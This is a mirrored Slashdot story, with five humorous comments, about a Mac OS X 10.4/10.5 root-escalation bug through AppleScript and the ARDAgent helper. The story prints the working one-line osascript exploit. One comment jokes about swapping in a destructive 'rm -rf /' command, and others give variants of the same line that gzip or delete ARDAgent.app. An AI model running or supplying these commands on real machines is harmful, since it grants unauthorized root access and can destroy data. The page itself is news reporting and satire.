Slashdot Mirror


Mac OS X Root Escalation Through AppleScript

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

5 of 359 comments

  1. Re:Can we get some sources? by Anonymous Coward · · Score: 5, Funny

    who needs a source, it works. tried on my mac, output is: root

    so i tried replacing "whoami" with "rm -rf /" and

    !@#ca$a%H&(
    +++NO CARRIER

  2. Re:This is a serious privilege escalation bug, but by Applekid · · Score: 5, Funny

    . . . It's a classic blunder, like getting into a land war in Asia . . . 99 44/100 percent . . . Security is like sex. Once you're penetrated you're ****ed. You are now my new favorite poster.
    --
    More Twoson than Cupertino
  3. Re:Oh good by robfoo · · Score: 5, Funny

    Yeah, right.

  4. Re:Recipe for neutralizing it by eikonos · · Score: 5, Funny

    Why use sudo when you could just use the ARDAgent hack instead?
    osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';

  5. Re:Recipe for neutralizing it by aetherworld · · Score: 5, Funny

    Nononono....

    it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';